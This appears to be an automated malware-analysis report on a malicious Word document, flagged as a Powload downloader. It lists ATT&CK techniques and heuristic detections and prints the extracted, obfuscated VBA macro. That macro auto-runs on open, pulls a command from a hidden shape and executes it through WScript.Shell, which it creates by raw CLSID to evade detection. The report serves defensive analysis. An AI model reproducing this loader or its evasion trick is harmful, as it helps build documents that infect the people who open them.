MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are configured to execute automatically upon opening. These macros leverage the WScript.Shell COM object to invoke cmd.exe, which in turn appears to download and execute a second-stage payload. The obfuscated command line suggests an attempt to download content from multiple URLs and execute it.
Heuristics 9
-
ClamAV: Doc.Malware.Powload-6794695-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6794695-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12509 bytes |
SHA-256: ebd3b826e21b8f0a178abe8b91f77b215a5b07ae99b070be4df57d42c7ecd6ea |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
150 of 239 identifiers look randomly generated (e.g. 'XIZqfYfGWLzjO') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XIZqfYfGWLzjO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each tCRmww In cjOZubIUH
kTidzb = 112378313 + Oct(199149819) - 145297173 - CBool(68214206 / 158638743) * 210112948 + Log(BWDFEpWI - CLng(42217841)) - 121179680 + Hex(UWaQwB)
Next
Select Case nIlSZJi
Case 313746974
AIanbwB = Cos(85802899)
rWDfl = 31330792
Case 195015284
UJbAA = Sqr(208968723 / CSng(134342122 - Cos(207623383 - 242741274) + viztXIN + Rnd(148788059 - 338837569)))
ijYUNNGf = Hex(IXhoXpZ)
End Select
On Error Resume Next
For Each zbWzcRhHC In VQIIhBfbO
bfAvuww = 285128931 + Oct(328483897) - 269893510 - CBool(230402183 / 233212404) * 262124774 + Log(FVTZhOA - CLng(137751222)) - 125701621 + Hex(wRCYTM)
Next
Select Case OspTTbaF
Case 209804501
qJNPmd = Cos(218375070)
MhGtz = 145696194
Case 46301993
lwcuYX = Sqr(246078164 / CSng(21915691 - Cos(132193451 - 280941349) + ImttTBtKL + Rnd(34774905 - 333976953)))
oVVHif = Hex(tTMGpdc)
End Select
On Error Resume Next
For Each NZVHrkKL In TjuLhH
lVtAMKsU = 259077105 + Oct(175872382) - 96739789 - CBool(35102662 / 198149222) * 290174166 + Log(jNMjf - CLng(284338957)) - 92618784 + Hex(bZKUcwhol)
Next
Select Case iSwlj
Case 174291133
jATQV = Cos(32184809)
TMzjzzbw = 155141669
Case 162786170
aCqPVG = Sqr(252119536 / CSng(194267258 - Cos(6805720 - 311031811) + Ivilhzq + Rnd(305159641 - 210617841)))
UcAQz = Hex(pncku)
End Select
Set zcGIqZF = Shapes("vDinjphmffzs")
On Error Resume Next
For Each MDRDNark In uAGiriYA
mrEdQHZlp = 254285671 + Oct(19122784) - 162367836 - CBool(336891763 / 66175435) * 173302926 + Log(KSISf - CLng(163333038)) - 155647580 + Hex(cNjYMRtTA)
Next
Select Case BWijmJ
Case 201942448
kEhHvqj = Cos(194704665)
PPiLNTFA = 19093991
Case 182887480
ZXtjY = Sqr(248290747 / CSng(53285955 - Cos(26037610 - 121193674) + jwnEoTS + Rnd(143824799 - 123476259)))
sjkdDRBo = Hex(cijhi)
End Select
pJIiAJ = "" + ziJic + jQuHY + zcGIqZF.TextFrame.TextRange.Text + fkmIqnPj + TBpswRJ
On Error Resume Next
For Each KlzYSHp In QhKMTjcLF
voNuPju = 234496582 + Oct(1425250) - 31340175 - CBool(142093183 / 33377164) * 125691362 + Log(sUijbHC - CLng(74975817)) - 338099482 + Hex(zwmqKT)
Next
Select Case BKBPRQ
Case 103785002
QdjHlcL = Cos(92786179)
TwBwjwZk = 269902525
Case 338384224
SzDZjrUuR = Sqr(79108391 / CSng(176429965 - Cos(28057715 - 99123954) + KdTEOl + Rnd(251134105 - 229025172)))
WLRRR = Hex(bicQSC)
End Select
On Error Resume Next
For Each ftkth In HASoPDlQp
SFRous = 156988949 + Oct(76575773) - 86076362 - CBool(188578818 / 122962510) * 131309480 + Log(DaIAcWW - CLng(220659342)) - 189999582 + Hex(joEoFF)
Next
Select Case DHMAZt
Case 251970365
PnVZjEf = Cos(257714439)
ONGCJuS = 200111815
Case 277042021
lzpDSGBZK = Sqr(47967789 / CSng(146232941 - Cos(199003495 - 220110428) + YMiBIwH + Rnd(1979232 - 9859246)))
ZswItNu = Hex(jzAbajD)
End Select
On Error Resume Next
For Each ApwVn In CMELjroC
GmmnTI = 150319400 + Oct(74223059) - 164437374 - CBool(106263990 / 196000478) * 306182640 + Log(aWsjLb - CLng(139535718)) - 156415883 + Hex(iwRthOjrn)
Next
Select Case PrOHz
Case 13310610
rdiXFJum = Cos(250255883)
TAjNhtPI = 264091739
Case 148511364
bIihcZi = Sqr(161598292 / CSng(73405706 - Cos(97771756 - 310491447) + bjrtTYoW + Rnd(50072898 - 310411630)))
NqHqiwzz = Hex(fLQVz)
End Select
Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
On Error Resume Next
For Each kPvffaG In iXnFZ
TwMcLFH = 106739644 + Oct(49428363) - 184576167 - CBool(190154976 / 113153842) * 161566816 + Log(GYiKm - CLng(68716136)) - 335240117 + Hex(DTQzKq)
Next
Select Case hXPHmUX
Case 152511519
RdPUHS = Cos(18580377)
BCwGpd = 124286432
Case 100634376
FvsMOuQ = Sqr(246946014 / CSng(168943465 - Cos(31805175 - 91061648) + ljjBV + Rnd(296581296 - 65308892)))
iFkQCvIsY = Hex(twrMPbiAD)
End Select
On Error Resume Next
For Each CqlvcV In DXlrz
hzuha = 333954160 + Oct(188842666) - 270372512 - CBool(1665060 / 77100024) * 252099489 + Log(tsJBivHEr - CLng(138430097)) - 201600949 + Hex(jRaWS)
Next
Select Case MoqXm
Case 162925158
GwSmbB = Cos(202943925)
wjcqBsqju = 103417532
Case 80444247
qAIXGW = Sqr(314512782 / CSng(338263058 - Cos(325885581 - 45266167) + FlmYwoR + Rnd(104111737 - 125393019)))
FhizfRLVF = Hex(HaEYFnujF)
End Select
On Error Resume Next
For Each MZzwQnqo In QDooRffIS
azQpnQa = 230397907 + Oct(66222082) - 321930399 - CBool(260581950 / 292594431) * 265421505 + Log(OqnwjQL - CLng(166795692)) - 323400044 + Hex(AozpDniO)
Next
Select Case CVlvkMfqE
Case 212535782
HXPOabrhb = Cos(12874634)
BBdowS = 244782857
Case 204857202
OZulEcu = Sqr(25431236 / CSng(247759652 - Cos(3871274 - 174536033) + tFjcZ + Rnd(229238273 - 97945176)))
wBmwnTk = Hex(vONEZJ)
End Select
On Error Resume Next
For Each FjGpuG In dhSwCGjpz
DzkuJs = 130566134 + Oct(230877970) - 315485465 - CBool(240704876 / 280430972) * 270157331 + Log(KNSBXp - CLng(206175781)) - 274272612 + Hex(JpBLYZvv)
Next
Select Case QVKpwa
Case 160069389
onGzWzoQH = Cos(230948378)
FMASYUnv = 296698585
Case 328270162
unARZT = Sqr(44745590 / CSng(134832990 - Cos(96197724 - 290347221) + bAsijnp + Rnd(87782821 - 311598299)))
qKqHQC = Hex(VLifwTsT)
End Select
Const YqdNOZWNFsO = 0
On Error Resume Next
For Each vHRwKItYm In XkmmqNuC
qmtpjYMI = 5261330 + Oct(337583859) - 28218305 - CBool(16521689 / 250367537) * 113303406 + Log(wJGucPw - CLng(78686759)) - 223488177 + Hex(TzJjrlZjk)
Next
Select Case JBSkZwzs
Case 167638167
ilTMqjGz = Cos(168295996)
taLsMZ = 21015202
Case 188878421
NiVBi = Sqr(107425643 / CSng(304311773 - Cos(284297681 - 144605082) + iQDmzOi + Rnd(210510536 - 317704214)))
KfaHRpiqa = Hex(AuWjLDM)
End Select
On Error Resume Next
For Each jjcwwAsO In YmJLIVNPb
wHtioIC = 131669723 + Oct(297451596) - 260858401 - CBool(167628492 / 130122781) * 24120620 + Log(vKkwwE - CLng(334771589)) - 16762167 + Hex(BvImAHij)
Next
Select Case VPHjqF
Case 267809812
vjzbSFivP = Cos(328242907)
PQXjwWri = 209152702
Case 147033808
MOGJz = Sqr(267054494 / CSng(40785877 - Cos(100795948 - 130272771) + JIISDJiq + Rnd(167446204 - 281235507)))
JtRwwiLK = Hex(WITuTkUIH)
End Select
On Error Resume Next
For Each OfzHou In JwEUAOZXi
biiXh = 190053357 + Oct(140719652) - 98975785 - CBool(238431501 / 184009054) * 52328566 + Log(iwAjiEJ - CLng(188550759)) - 183517849 + Hex(GqWsHVjHt)
Next
Select Case GWbJAth
Case 16663999
sESmdSG = Cos(127611853)
fVNGjk = 156406794
Case 259854236
oVzfd = Sqr(229912357 / CSng(225648339 - Cos(160167525 - 48209067) + qjpWHAi + Rnd(251020476 - 261580179)))
sZACT = Hex(XLAqqlM)
End Select
On Error Resume Next
For Each sBdkdLfBZ In ihuEXJu
jhbnjkV = 342184647 + Oct(35294010) - 149084274 - CBool(163655035 / 118014504) * 252883244 + Log(cWnDuM - CLng(340869608)) - 98673304 + Hex(TlfRFULCd)
Next
Select Case DZNREVsPd
Case 40155471
dHmRE = Cos(154286559)
UPiVRp = 55739726
Case 13121030
TPftT = Sqr(311442042 / CSng(186194380 - Cos(229554633 - 286130372) + EjhBzV + Rnd(58517834 - 230879489)))
iszAzuiOH = Hex(IXJCUZzw)
End Select
On Error Resume Next
For Each QAbrKN In THbVkjE
TiiPqMLTA = 84060069 + Oct(12611690) - 96872909 - CBool(120321703 / 194036103) * 184622630 + Log(wnDBvd - CLng(236748226)) - 108238166 + Hex(LUjbjA)
Next
Select Case rkzSoDw
Case 12798221
hbiIw = Cos(30508862)
fHWzfCzpu = 95623090
Case 331322088
sbrTLYX = Sqr(224383702 / CSng(209110041 - Cos(61910038 - 205578225) + oBvOBFHSH + Rnd(200701511 - 27745161)))
KDzokH = Hex(ZFTJipH)
End Select
On Error Resume Next
For Each jomNUGAW In JjwrZ
BjBrp = 212867215 + Oct(1993251) - 214060530 - CBool(188161058 / 36976412) * 336378897 + Log(Dtzhs - CLng(47427158)) - 327097053 + Hex(ZjzYfKqSu)
Next
Select Case VjAAp
Case 325411059
bSBjH = Cos(64390780)
VFzcC = 179905002
Case 260675052
ubcUjcMfp = Sqr(223196655 / CSng(247638907 - Cos(121503574 - 234528600) + zCDBYR + Rnd(270395754 - 319442234)))
RWpDZN = Hex(PTWioY)
End Select
ZZKijTUEO.Run! pJIiAJ, YqdNOZWNFsO
On Error Resume Next
For Each mDSRNbQ In pwLzCLj
NjzDQSW = 28521830 + Oct(46801003) - 77671906 - CBool(52421925 / 9402214) * 31357133 + Log(Bakjz - CLng(76881356)) - 186922943 + Hex(YvPsovj)
Next
Select Case fDjEF
Case 197606317
WNUhO = Cos(67366311)
TOVjw = 241016264
Case 89213563
OVwmHDo = Sqr(162280576 / CSng(196984544 - Cos(173743803 - 157300997) + jEVAD + Rnd(155565286 - 118291919)))
SdiOQX = Hex(AWHwvpJ)
End Select
On Error Resume Next
For Each iZdpF In Uawli
nUfOqzAic = 285244140 + Oct(156430341) - 38281510 - CBool(128212703 / 172978297) * 325938849 + Log(KKhNjz - CLng(283682856)) - 10685003 + Hex(ZRKqRoPim)
Next
Select Case TrJUFMYZ
Case 260899405
XWfHA = Cos(102563597)
EQOoddPQ = 208631984
Case 277927964
KCIXhkibB = Sqr(275503653 / CSng(187462752 - Cos(8352407 - 48249859) + DzbDmCp + Rnd(15225306 - 19543668)))
SYBqNt = Hex(ZWjOl)
End Select
On Error Resume Next
For Each jjdGlzvfL In KGKYkfCH
MzBNkUs = 84301880 + Oct(6496923) - 289920881 - CBool(318138230 / 157775463) * 204418339 + Log(uWvzF - CLng(212113130)) - 55957420 + Hex(kjlHhwLT)
Next
Select Case kJKttiVt
Case 246511817
kunOQfFPB = Cos(266420009)
zbQhNVbd = 259275296
Case 317289365
hGMOU = Sqr(57297455 / CSng(5257771 - Cos(291846325 - 169393740) + TmYkw + Rnd(114481797 - 139774352)))
cjJfCmh = Hex(LjJuPwziN)
End Select
On Error Resume Next
For Each qTjqwf In EhdAwE
KbXzWJ = 78796853 + Oct(30647158) - 337293845 - CBool(206463953 / 241990802) * 140367273 + Log(wZEFoDLLQ - CLng(39957539)) - 282306390 + Hex(hboZzpXC)
Next
Select Case ipvnvjB
Case 252434425
AGamQf = Cos(192246898)
LtsHtVj = 100545256
Case 270212401
XiBqMTYU = Sqr(233397964 / CSng(62739947 - Cos(113861923 - 295591039) + JZwFkHv + Rnd(72567514 - 59446344)))
ZdiJNkUOY = Hex(wiHSK)
End Select
On Error Resume Next
For Each QNDAKCqz In BamncLM
YStEC = 245489871 + Oct(276736793) - 215207724 - CBool(333296236 / 120790748) * 228769178 + Log(EBAVOGi - CLng(277160228)) - 51330166 + Hex(njOHMVOj)
Next
Select Case oEhGu
Case 82416589
OcNULkIW = Cos(122456823)
aQYVcWBif = 69462747
Case 277720160
ZUSPMuVWu = Sqr(38665808 / CSng(59746427 - Cos(229226672 - 291790028) + cndCa + Rnd(283971110 - 272496274)))
uzKkLi = Hex(XOBpTDsB)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.